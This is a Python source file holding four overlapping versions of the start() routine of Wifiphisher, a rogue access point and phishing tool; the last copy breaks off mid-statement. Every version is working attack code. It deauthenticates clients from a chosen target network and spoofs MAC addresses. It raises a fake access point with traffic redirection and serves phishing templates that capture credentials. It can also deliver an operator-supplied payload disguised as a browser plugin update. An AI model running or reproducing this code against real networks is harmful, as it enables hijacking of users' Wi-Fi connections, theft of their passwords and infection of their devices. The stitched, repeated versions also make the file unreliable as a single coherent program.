def start(self): today = time.strftime("%Y-%m-%d %H:%M") print( '[' + T + '*' + W + '] Starting Wifiphisher %s ( %s ) at %s' % (VERSION, WEBSITE, today)) # Show some emotions. if BIRTHDAY in today: print '[' + T + '*' + W + \ '] Wifiphisher was first released on this day in 2015! ' \ 'Happy birthday!' if NEW_YEAR in today: print '[' + T + '*' + W + \ '] Happy new year!' # First of - are you root? if os.geteuid(): logger.error("Non root user detected") sys.exit('[' + R + '-' + W + '] Please run as root') # Set the channel range set_channel_range() # Parse args global args, APs args = parse_args() # setup the logging configuration setup_logging(args) if args.phishing_pages_directory: # check if the path ends with the proper separator, if not add it # this is to prevent problems when joining path with string concatenation if args.phishing_pages_directory[-1] != os.path.sep: args.phishing_pages_directory += os.path.sep phishing_pages_dir = args.phishing_pages_directory logger.info("Searching for scenario in %s" % phishing_pages_dir) if args.dnsmasq_conf: self.access_point.dns_conf_path = args.dnsmasq_conf if args.credential_log_path: phishinghttp.credential_log_path = args.credential_log_path # Initialize the operation mode manager self.opmode.initialize(args) # Set operation mode self.opmode.set_opmode(args, self.network_manager) self.network_manager.start() # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: if self.opmode.internet_sharing_enabled(): self.network_manager.internet_access_enable = True if self.network_manager.is_interface_valid( args.internetinterface, "internet"): internet_interface = args.internetinterface if interfaces.is_wireless_interface(internet_interface): self.network_manager.unblock_interface( internet_interface) logger.info("Selecting %s interface for accessing internet", args.internetinterface) # check if the interface for WPS is valid if self.opmode.assoc_enabled(): if self.network_manager.is_interface_valid( args.wpspbc_assoc_interface, "WPS"): logger.info("Selecting %s interface for WPS association", args.wpspbc_assoc_interface) if self.opmode.extensions_enabled(): if args.extensionsinterface and args.apinterface: if self.network_manager.is_interface_valid( args.extensionsinterface, "monitor"): mon_iface = args.extensionsinterface self.network_manager.unblock_interface(mon_iface) if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: mon_iface, ap_iface = self.network_manager.get_interface_automatically( ) # display selected interfaces to the user logger.info( "Selecting {} for deauthentication and {} for the rogue Access Point" .format(mon_iface, ap_iface)) print( "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication " "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the " "rogue Access Point").format(G, W, mon_iface, ap_iface) if not self.opmode.extensions_enabled(): if args.apinterface: if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: ap_iface = self.network_manager.get_interface(True, False) mon_iface = ap_iface print( "[{0}+{1}] Selecting {0}{2}{1} interface for creating the " "rogue Access Point").format(G, W, ap_iface) logger.info( "Selecting {} interface for rogue Access Point".format( ap_iface)) # Randomize MAC if not args.no_mac_randomization: try: new_mac = self.network_manager.set_interface_mac( ap_iface, args.mac_ap_interface) logger.info("Changing {} MAC address to {}".format( ap_iface, new_mac)) print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format( G, W, ap_iface, new_mac) if mon_iface != ap_iface: new_mac = self.network_manager.set_interface_mac( mon_iface, args.mac_extensions_interface) logger.info("Changing {} MAC address to {}".format( mon_iface, new_mac)) print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format( G, W, ap_iface, new_mac) except interfaces.InvalidMacAddressError as err: print("[{0}!{1}] {2}").format(R, W, err) # make sure interfaces are not blocked logger.info("Unblocking interfaces") self.network_manager.unblock_interface(ap_iface) self.network_manager.unblock_interface(mon_iface) # set monitor mode only when --essid is not given if self.opmode.extensions_enabled() or args.essid is None: self.network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.InvalidInterfaceError, interfaces.InterfaceCantBeFoundError, interfaces.InterfaceManagedByNetworkManagerError) as err: logging.exception("The following error has occurred:") print("[{0}!{1}] {2}").format(R, W, err) time.sleep(1) self.stop() if not args.internetinterface and not args.keepnetworkmanager: kill_interfering_procs() logger.info("Killing all interfering processes") if self.opmode.internet_sharing_enabled(): self.fw.nat(ap_iface, args.internetinterface) set_ip_fwd() else: self.fw.redirect_requests_localhost() set_route_localnet() print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables' time.sleep(1) if args.essid: essid = args.essid channel = str(CHANNEL) # We don't have target attacking MAC in frenzy mode # That is we deauth all the BSSIDs that being sniffed target_ap_mac = None enctype = None else: # let user choose access point # start the monitor adapter self.network_manager.up_interface(mon_iface) ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher, self.network_manager, args) ap_sel_object = tui.TuiApSel() access_point = curses.wrapper(ap_sel_object.gather_info, ap_info_object) # if the user has chosen a access point continue # otherwise shutdown if access_point: # store choosen access point's information essid = access_point.name channel = access_point.channel target_ap_mac = access_point.mac_address enctype = access_point.encryption else: self.stop() # create a template manager object self.template_manager = phishingpage.TemplateManager( data_pages=args.phishing_pages_directory) # get the correct template tui_template_obj = tui.TuiTemplateSelection() template = tui_template_obj.gather_info(args.phishingscenario, self.template_manager) logger.info("Selecting {} template".format( template.get_display_name())) print("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if template.has_payload(): payload_path = args.payload_path # copy payload to update directory while not payload_path or not os.path.isfile(payload_path): # get payload path payload_path = raw_input( "[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") if not os.path.isfile(payload_path): print '[' + R + '-' + W + '] Invalid file path!' print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ' template.update_payload_path(os.path.basename(payload_path)) copyfile( payload_path, self.template_manager.template_directory + template.get_payload_path()) APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0] or "", 'essid': APs[i][1] or "", 'bssid': APs[i][2] or "", 'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or "" }) template.merge_context({'APs': APs_context}) # only get logo path if MAC address is present ap_logo_path = False if target_ap_mac is not None: ap_logo_path = template.use_file( self.mac_matcher.get_vendor_logo_path(target_ap_mac)) template.merge_context({ 'target_ap_channel': channel or "", 'target_ap_essid': args.phishing_essid or essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_vendor': self.mac_matcher.get_vendor_name(target_ap_mac) or "", 'target_ap_logo_path': ap_logo_path or "" }) # add wps_enable into the template context if args.wps_pbc: template.merge_context({'wps_pbc_attack': "1"}) else: template.merge_context({'wps_pbc_attack': "0"}) # We want to set this now for hostapd. Maybe the interface was in "monitor" # mode for network discovery before (e.g. when --noextensions is enabled). self.network_manager.set_interface_mode(ap_iface, "managed") # Start AP self.network_manager.up_interface(ap_iface) self.access_point.interface = ap_iface self.access_point.channel = channel self.access_point.essid = essid if args.force_hostapd: print( '[' + T + '*' + W + '] Using hostapd instead of roguehostapd.' " Many significant features will be turned off.") self.access_point.force_hostapd = True if args.wpspbc_assoc_interface: wps_mac = self.network_manager.get_interface_mac( args.wpspbc_assoc_interface) self.access_point.deny_mac_addrs.append(wps_mac) if args.presharedkey: self.access_point.presharedkey = args.presharedkey if self.opmode.internet_sharing_enabled(): self.access_point.internet_interface = args.internetinterface print '[' + T + '*' + W + '] Starting the fake access point...' try: self.access_point.start(disable_karma=args.disable_karma) self.access_point.start_dhcp_dns() except BaseException: self.stop() # Start Extension Manager (EM) # We need to start EM before we boot the web server if self.opmode.extensions_enabled(): shared_data = { 'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(), 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_logo_path': ap_logo_path or "", 'rogue_ap_essid': essid or "", 'rogue_ap_mac': self.network_manager.get_interface_mac(ap_iface), 'roguehostapd': self.access_point.hostapd_object, 'APs': APs_context, 'args': args } self.network_manager.up_interface(mon_iface) self.em.set_interface(mon_iface) extensions = DEFAULT_EXTENSIONS if args.lure10_exploit: extensions.append(LURE10_EXTENSION) if args.handshake_capture: extensions.append(HANDSHAKE_VALIDATE_EXTENSION) if args.nodeauth: extensions.remove(DEAUTH_EXTENSION) if args.wps_pbc: extensions.append(WPSPBC) if args.known_beacons: extensions.append(KNOWN_BEACONS_EXTENSION) if not args.force_hostapd: extensions.append(ROGUEHOSTAPDINFO) self.em.set_extensions(extensions) self.em.init_extensions(shared_data) self.em.start_extensions() # With configured DHCP, we may now start the web server if not self.opmode.internet_sharing_enabled(): # Start HTTP server in a background thread print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str( PORT) + ", " + str(SSL_PORT) webserver = Thread(target=phishinghttp.runHTTPServer, args=(NETWORK_GW_IP, PORT, SSL_PORT, template, self.em)) webserver.daemon = True webserver.start() time.sleep(1.5) # We no longer need mac_matcher self.mac_matcher.unbind() clients_APs = [] APs = [] # Main loop. try: main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em, phishinghttp, args) tui_main_object = tui.TuiMain() curses.wrapper(tui_main_object.gather_info, main_info) self.stop() except KeyboardInterrupt: self.stop()
def start(self): # Parse args global args, APs args = parse_args() # Check args check_args(args) # Are you root? if os.geteuid(): sys.exit('[' + R + '-' + W + '] Please run as root') self.network_manager.start() # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: if args.internetinterface: if self.network_manager.is_interface_valid( args.internetinterface, "internet"): internet_interface = args.internetinterface self.network_manager.unblock_interface(internet_interface) if not args.nojamming: if args.jamminginterface and args.apinterface: if self.network_manager.is_interface_valid( args.jamminginterface, "monitor"): mon_iface = args.jamminginterface self.network_manager.unblock_interface(mon_iface) if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: mon_iface, ap_iface = self.network_manager.get_interface_automatically( ) # display selected interfaces to the user print( "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication " "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the " "rogue Access Point").format(G, W, mon_iface, ap_iface) # randomize the mac addresses if not args.no_mac_randomization: if args.mac_ap_interface: self.network_manager.set_interface_mac( ap_iface, args.mac_ap_interface) else: self.network_manager.set_interface_mac_random(ap_iface) if args.mac_deauth_interface: self.network_manager.set_interface_mac( mon_iface, args.mac_deauth_interface) else: self.network_manager.set_interface_mac_random( mon_iface) else: if args.apinterface: if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: ap_iface = self.network_manager.get_interface(True, False) mon_iface = ap_iface if not args.no_mac_randomization: if args.mac_ap_interface: self.network_manager.set_interface_mac( ap_iface, args.mac_ap_interface) else: self.network_manager.set_interface_mac_random(ap_iface) print( "[{0}+{1}] Selecting {0}{2}{1} interface for creating the " "rogue Access Point").format(G, W, ap_iface) # randomize the mac addresses if not args.no_mac_randomization: self.network_manager.set_interface_mac_random(ap_iface) # make sure interfaces are not blocked self.network_manager.unblock_interface(ap_iface) self.network_manager.unblock_interface(mon_iface) if not args.internetinterface: kill_interfering_procs() self.network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.InvalidInterfaceError, interfaces.InterfaceCantBeFoundError, interfaces.InterfaceManagedByNetworkManagerError) as err: print("[{0}!{1}] {2}").format(R, W, err) time.sleep(1) self.stop() if not args.no_mac_randomization: ap_mac = self.network_manager.get_interface_mac(ap_iface) print "[{0}+{1}] {2} mac address becomes is now {3} ".format( G, W, ap_iface, ap_mac) if not args.nojamming: mon_mac = self.network_manager.get_interface_mac(mon_iface) print("[{0}+{1}] {2} mac address becomes {3}".format( G, W, mon_iface, mon_mac)) if args.internetinterface: self.fw.nat(ap_iface, args.internetinterface) set_ip_fwd() else: self.fw.redirect_requests_localhost() set_route_localnet() print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables' time.sleep(1) if args.essid: essid = args.essid channel = str(CHANNEL) ap_mac = None enctype = None else: # let user choose access point access_point = curses.wrapper(select_access_point, mon_iface, self.mac_matcher, self.network_manager) # if the user has chosen a access point continue # otherwise shutdown if access_point: # store choosen access point's information essid = access_point.get_name() channel = access_point.get_channel() ap_mac = access_point.get_mac_address() enctype = access_point.get_encryption() else: self.stop() # create a template manager object self.template_manager = phishingpage.TemplateManager() # get the correct template template = select_template(args.phishingscenario, self.template_manager) print("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if template.has_payload(): payload_path = False # copy payload to update directory while not payload_path or not os.path.isfile(payload_path): # get payload path payload_path = raw_input( "[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") if not os.path.isfile(payload_path): print '[' + R + '-' + W + '] Invalid file path!' print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ' copyfile(payload_path, PHISHING_PAGES_DIR + template.get_payload_path()) APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0] or "", 'essid': APs[i][1] or "", 'bssid': APs[i][2] or "", 'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or "" }) template.merge_context({'APs': APs_context}) # only get logo path if MAC address is present ap_logo_path = False if ap_mac: ap_logo_path = template.use_file( self.mac_matcher.get_vendor_logo_path(ap_mac)) template.merge_context({ 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_vendor': self.mac_matcher.get_vendor_name(ap_mac) or "", 'target_ap_logo_path': ap_logo_path or "" }) # We want to set this now for hostapd. Maybe the interface was in "monitor" # mode for network discovery before (e.g. when --nojamming is enabled). self.network_manager.set_interface_mode(ap_iface, "managed") # Start AP self.access_point.set_interface(ap_iface) self.access_point.set_channel(channel) self.access_point.set_essid(essid) if args.presharedkey: self.access_point.set_psk(args.presharedkey) if args.internetinterface: self.access_point.set_internet_interface(args.internetinterface) print '[' + T + '*' + W + '] Starting the fake access point...' try: self.access_point.start() self.access_point.start_dhcp_dns() except BaseException: self.stop() # With configured DHCP, we may now start the web server if not args.internetinterface: # Start HTTP server in a background thread print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str( PORT) + ", " + str(SSL_PORT) webserver = Thread(target=phishinghttp.runHTTPServer, args=(NETWORK_GW_IP, PORT, SSL_PORT, template)) webserver.daemon = True webserver.start() time.sleep(1.5) # We no longer need mac_matcher self.mac_matcher.unbind() clients_APs = [] APs = [] if not args.nojamming: # Start Extension Manager shared_data = { 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_logo_path': ap_logo_path or "", 'rogue_ap_mac': ap_mac, 'APs': APs_context, 'args': args } self.em.set_interface(mon_iface) extensions = DEFAULT_EXTENSIONS if args.lure10_exploit: extensions.append(LURE10_EXTENSION) self.em.set_extensions(extensions) self.em.init_extensions(shared_data) self.em.start_extensions() # Main loop. try: term = Terminal() with term.fullscreen(): while True: term.clear() with term.hidden_cursor(): print term.move(0, term.width - 30) + "|" print term.move( 1, term.width - 30) + "|" + " " + term.bold_blue("Wifiphisher " + VERSION) print term.move( 2, term.width - 30) + "|" + " ESSID: " + essid print term.move( 3, term.width - 30) + "|" + " Channel: " + channel print term.move( 4, term.width - 30) + "|" + " AP interface: " + ap_iface print term.move(5, term.width - 30) + "|" + "_" * 29 print term.move( 1, 0) + term.blue("Deauthenticating clients: ") if not args.nojamming: # show the 5 most recent entries for line in self.em.get_output()[-5:]: print line print term.move(7, 0) + term.blue("DHCP Leases: ") if os.path.isfile('/var/lib/misc/dnsmasq.leases'): proc = check_output( ['tail', '-5', '/var/lib/misc/dnsmasq.leases']) print term.move(8, 0) + proc print term.move(14, 0) + term.blue("HTTP requests: ") if os.path.isfile('/tmp/wifiphisher-webserver.tmp'): proc = check_output([ 'tail', '-5', '/tmp/wifiphisher-webserver.tmp' ]) print term.move(15, 0) + proc if phishinghttp.terminate and args.quitonsuccess: raise KeyboardInterrupt except KeyboardInterrupt: self.stop()
def start(self): # Parse args global args, APs args = parse_args() # setup the logging configuration setup_logging(args) # Initialize the operation mode manager self.opmode.initialize(args) # Set operation mode self.opmode.set_opmode(args, self.network_manager) # Are you root? if os.geteuid(): logger.error("Non root user detected") sys.exit('[' + R + '-' + W + '] Please run as root') self.network_manager.start() # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: if self.opmode.internet_sharing_enabled(): self.network_manager.internet_access_enable = True if self.network_manager.is_interface_valid( args.internetinterface, "internet"): internet_interface = args.internetinterface if interfaces.is_wireless_interface(internet_interface): self.network_manager.unblock_interface( internet_interface) logger.info("Selecting %s interface for accessing internet", args.internetinterface) # check if the interface for WPS is valid if self.opmode.assoc_enabled(): if self.network_manager.is_interface_valid( args.wpspbc_assoc_interface, "WPS"): logger.info("Selecting %s interface for WPS association", args.wpspbc_assoc_interface) if self.opmode.extensions_enabled(): if args.extensionsinterface and args.apinterface: if self.network_manager.is_interface_valid( args.extensionsinterface, "monitor"): mon_iface = args.extensionsinterface self.network_manager.unblock_interface(mon_iface) if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: mon_iface, ap_iface = self.network_manager.get_interface_automatically( ) # display selected interfaces to the user logger.info( "Selecting {} for deauthentication and {} for the rogue Access Point" .format(mon_iface, ap_iface)) print( "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication " "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the " "rogue Access Point").format(G, W, mon_iface, ap_iface) # randomize the mac addresses if not args.no_mac_randomization: if args.mac_ap_interface: self.network_manager.set_interface_mac( ap_iface, args.mac_ap_interface) else: self.network_manager.set_interface_mac_random(ap_iface) if args.mac_extensions_interface: self.network_manager.set_interface_mac( mon_iface, args.mac_deauth_interface) else: self.network_manager.set_interface_mac_random( mon_iface) if not self.opmode.extensions_enabled(): if args.apinterface: if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: ap_iface = self.network_manager.get_interface(True, False) mon_iface = ap_iface if not args.no_mac_randomization: if args.mac_ap_interface: self.network_manager.set_interface_mac( ap_iface, args.mac_ap_interface) else: self.network_manager.set_interface_mac_random(ap_iface) print( "[{0}+{1}] Selecting {0}{2}{1} interface for creating the " "rogue Access Point").format(G, W, ap_iface) logger.info( "Selecting {} interface for rouge access point".format( ap_iface)) # randomize the mac addresses if not args.no_mac_randomization: self.network_manager.set_interface_mac_random(ap_iface) # make sure interfaces are not blocked logger.info("Unblocking interfaces") self.network_manager.unblock_interface(ap_iface) self.network_manager.unblock_interface(mon_iface) # set monitor mode only when --essid is not given if self.opmode.extensions_enabled() or args.essid is None: self.network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.InvalidInterfaceError, interfaces.InterfaceCantBeFoundError, interfaces.InterfaceManagedByNetworkManagerError) as err: logger.exception("The following error has occurred:") print("[{0}!{1}] {2}").format(R, W, err) time.sleep(1) self.stop() if not args.internetinterface: kill_interfering_procs() logger.info("Killing all interfering processes") rogue_ap_mac = self.network_manager.get_interface_mac(ap_iface) if not args.no_mac_randomization: logger.info("Changing {} MAC address to {}".format( ap_iface, rogue_ap_mac)) print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format( G, W, ap_iface, rogue_ap_mac) if self.opmode.extensions_enabled(): mon_mac = self.network_manager.get_interface_mac(mon_iface) logger.info("Changing {} MAC address to {}".format( mon_iface, mon_mac)) print("[{0}+{1}] Changing {2} MAC addr to {3}".format( G, W, mon_iface, mon_mac)) if self.opmode.internet_sharing_enabled(): self.fw.nat(ap_iface, args.internetinterface) set_ip_fwd() else: self.fw.redirect_requests_localhost() set_route_localnet() print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables' time.sleep(1) if args.essid: essid = args.essid channel = str(CHANNEL) # We don't have target attacking MAC in frenzy mode # That is we deauth all the BSSIDs that being sniffed target_ap_mac = None enctype = None else: # let user choose access point # start the monitor adapter self.network_manager.up_interface(mon_iface) ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher, self.network_manager, args) ap_sel_object = tui.TuiApSel() access_point = curses.wrapper(ap_sel_object.gather_info, ap_info_object) # if the user has chosen a access point continue # otherwise shutdown if access_point: # store choosen access point's information essid = access_point.get_name() channel = access_point.get_channel() target_ap_mac = access_point.get_mac_address() enctype = access_point.get_encryption() else: self.stop() # create a template manager object self.template_manager = phishingpage.TemplateManager() # get the correct template tui_template_obj = tui.TuiTemplateSelection() template = tui_template_obj.gather_info(args.phishingscenario, self.template_manager) logger.info("Selecting {} template".format( template.get_display_name())) print("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if template.has_payload(): payload_path = args.payload_path # copy payload to update directory while not payload_path or not os.path.isfile(payload_path): # get payload path payload_path = raw_input( "[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") if not os.path.isfile(payload_path): print '[' + R + '-' + W + '] Invalid file path!' print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ' template.update_payload_path(os.path.basename(payload_path)) copyfile(payload_path, PHISHING_PAGES_DIR + template.get_payload_path()) APs_context = [] for i in APs: APs_context.append({ 'channel': APs[i][0] or "", 'essid': APs[i][1] or "", 'bssid': APs[i][2] or "", 'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or "" }) template.merge_context({'APs': APs_context}) # only get logo path if MAC address is present ap_logo_path = False if target_ap_mac is not None: ap_logo_path = template.use_file( self.mac_matcher.get_vendor_logo_path(target_ap_mac)) template.merge_context({ 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_vendor': self.mac_matcher.get_vendor_name(target_ap_mac) or "", 'target_ap_logo_path': ap_logo_path or "" }) # We want to set this now for hostapd. Maybe the interface was in "monitor" # mode for network discovery before (e.g. when --noextensions is enabled). self.network_manager.set_interface_mode(ap_iface, "managed") # Start AP self.network_manager.up_interface(ap_iface) self.access_point.set_interface(ap_iface) self.access_point.set_channel(channel) self.access_point.set_essid(essid) if args.wpspbc_assoc_interface: wps_mac = self.network_manager.get_interface_mac( args.wpspbc_assoc_interface) self.access_point.add_deny_macs([wps_mac]) if args.presharedkey: self.access_point.set_psk(args.presharedkey) if self.opmode.internet_sharing_enabled(): self.access_point.set_internet_interface(args.internetinterface) print '[' + T + '*' + W + '] Starting the fake access point...' try: self.access_point.start() self.access_point.start_dhcp_dns() except BaseException: self.stop() # Start Extension Manager (EM) # We need to start EM before we boot the web server if self.opmode.extensions_enabled(): shared_data = { 'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(), 'target_ap_channel': channel or "", 'target_ap_essid': essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_logo_path': ap_logo_path or "", 'rogue_ap_mac': rogue_ap_mac, 'APs': APs_context, 'args': args } self.network_manager.up_interface(mon_iface) self.em.set_interface(mon_iface) extensions = DEFAULT_EXTENSIONS if args.lure10_exploit: extensions.append(LURE10_EXTENSION) if args.handshake_capture: extensions.append(HANDSHAKE_VALIDATE_EXTENSION) if args.nodeauth: extensions.remove(DEAUTH_EXTENSION) if args.wpspbc_exploit: extensions.append(WPSPBC) self.em.set_extensions(extensions) self.em.init_extensions(shared_data) self.em.start_extensions() # With configured DHCP, we may now start the web server if not self.opmode.internet_sharing_enabled(): # Start HTTP server in a background thread print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str( PORT) + ", " + str(SSL_PORT) webserver = Thread(target=phishinghttp.runHTTPServer, args=(NETWORK_GW_IP, PORT, SSL_PORT, template, self.em)) webserver.daemon = True webserver.start() time.sleep(1.5) # We no longer need mac_matcher self.mac_matcher.unbind() clients_APs = [] APs = [] # Main loop. try: main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em, phishinghttp, args) tui_main_object = tui.TuiMain() curses.wrapper(tui_main_object.gather_info, main_info) self.stop() except KeyboardInterrupt: self.stop()
def start(self): today = time.strftime("%Y-%m-%d %H:%M") print ('[' + T + '*' + W + '] Starting Wifiphisher %s ( %s ) at %s' % (VERSION, WEBSITE, today)) # Show some emotions. if BIRTHDAY in today: print '[' + T + '*' + W + \ '] Wifiphisher was first released on this day in 2015! ' \ 'Happy birthday!' if NEW_YEAR in today: print '[' + T + '*' + W + \ '] Happy new year!' # First of - are you root? if os.geteuid(): logger.error("Non root user detected") sys.exit('[' + R + '-' + W + '] Please run as root') # Set the channel range set_channel_range() # Parse args global args, APs args = parse_args() # setup the logging configuration setup_logging(args) if args.phishing_pages_directory: # check if the path ends with the proper separator, if not add it # this is to prevent problems when joining path with string concatenation if args.phishing_pages_directory[-1] != os.path.sep: args.phishing_pages_directory += os.path.sep phishing_pages_dir = args.phishing_pages_directory logger.info("Searching for scenario in %s" % phishing_pages_dir) if args.dnsmasq_conf: self.access_point.dns_conf_path = args.dnsmasq_conf if args.credential_log_path: phishinghttp.credential_log_path = args.credential_log_path # Initialize the operation mode manager self.opmode.initialize(args) # Set operation mode self.opmode.set_opmode(args, self.network_manager) self.network_manager.start() # TODO: We should have more checks here: # Is anything binded to our HTTP(S) ports? # Maybe we should save current iptables rules somewhere # get interfaces for monitor mode and AP mode and set the monitor interface # to monitor mode. shutdown on any errors try: if self.opmode.internet_sharing_enabled(): self.network_manager.internet_access_enable = True if self.network_manager.is_interface_valid( args.internetinterface, "internet"): internet_interface = args.internetinterface if interfaces.is_wireless_interface(internet_interface): self.network_manager.unblock_interface( internet_interface) logger.info("Selecting %s interface for accessing internet", args.internetinterface) # check if the interface for WPS is valid if self.opmode.assoc_enabled(): if self.network_manager.is_interface_valid( args.wpspbc_assoc_interface, "WPS"): logger.info("Selecting %s interface for WPS association", args.wpspbc_assoc_interface) if self.opmode.extensions_enabled(): if args.extensionsinterface and args.apinterface: if self.network_manager.is_interface_valid( args.extensionsinterface, "monitor"): mon_iface = args.extensionsinterface self.network_manager.unblock_interface(mon_iface) if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: mon_iface, ap_iface = self.network_manager.get_interface_automatically( ) # display selected interfaces to the user logger.info( "Selecting {} for deauthentication and {} for the rogue Access Point" .format(mon_iface, ap_iface)) print( "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication " "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the " "rogue Access Point").format(G, W, mon_iface, ap_iface) if not self.opmode.extensions_enabled(): if args.apinterface: if self.network_manager.is_interface_valid( args.apinterface, "AP"): ap_iface = args.apinterface else: ap_iface = self.network_manager.get_interface(True, False) mon_iface = ap_iface print( "[{0}+{1}] Selecting {0}{2}{1} interface for creating the " "rogue Access Point").format(G, W, ap_iface) logger.info("Selecting {} interface for rogue Access Point" .format(ap_iface)) # Randomize MAC if not args.no_mac_randomization: try: new_mac = self.network_manager.set_interface_mac(ap_iface, args.mac_ap_interface) logger.info("Changing {} MAC address to {}".format( ap_iface, new_mac)) print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format( G, W, ap_iface, new_mac) if mon_iface != ap_iface: new_mac = self.network_manager.set_interface_mac(mon_iface, args.mac_extensions_interface) logger.info("Changing {} MAC address to {}".format( mon_iface, new_mac)) print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format( G, W, ap_iface, new_mac) except interfaces.InvalidMacAddressError as err: print("[{0}!{1}] {2}").format(R, W, err) # make sure interfaces are not blocked logger.info("Unblocking interfaces") self.network_manager.unblock_interface(ap_iface) self.network_manager.unblock_interface(mon_iface) # set monitor mode only when --essid is not given if self.opmode.extensions_enabled() or args.essid is None: self.network_manager.set_interface_mode(mon_iface, "monitor") except (interfaces.InvalidInterfaceError, interfaces.InterfaceCantBeFoundError, interfaces.InterfaceManagedByNetworkManagerError) as err: logging.exception("The following error has occurred:") print("[{0}!{1}] {2}").format(R, W, err) time.sleep(1) self.stop() if not args.internetinterface and not args.keepnetworkmanager: kill_interfering_procs() logger.info("Killing all interfering processes") if self.opmode.internet_sharing_enabled(): self.fw.nat(ap_iface, args.internetinterface) set_ip_fwd() else: self.fw.redirect_requests_localhost() set_route_localnet() print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables' time.sleep(1) if args.essid: essid = args.essid channel = str(CHANNEL) # We don't have target attacking MAC in frenzy mode # That is we deauth all the BSSIDs that being sniffed target_ap_mac = None enctype = None else: # let user choose access point # start the monitor adapter self.network_manager.up_interface(mon_iface) ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher, self.network_manager, args) ap_sel_object = tui.TuiApSel() access_point = curses.wrapper(ap_sel_object.gather_info, ap_info_object) # if the user has chosen a access point continue # otherwise shutdown if access_point: # store choosen access point's information essid = access_point.name channel = access_point.channel target_ap_mac = access_point.mac_address enctype = access_point.encryption else: self.stop() # create a template manager object self.template_manager = phishingpage.TemplateManager(data_pages=args.phishing_pages_directory) # get the correct template tui_template_obj = tui.TuiTemplateSelection() template = tui_template_obj.gather_info(args.phishingscenario, self.template_manager) logger.info("Selecting {} template".format( template.get_display_name())) print("[" + G + "+" + W + "] Selecting " + template.get_display_name() + " template") # payload selection for browser plugin update if template.has_payload(): payload_path = args.payload_path # copy payload to update directory while not payload_path or not os.path.isfile(payload_path): # get payload path payload_path = raw_input( "[" + G + "+" + W + "] Enter the [" + G + "full path" + W + "] to the payload you wish to serve: ") if not os.path.isfile(payload_path): print '[' + R + '-' + W + '] Invalid file path!' print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload ' template.update_payload_path(os.path.basename(payload_path)) copyfile(payload_path, 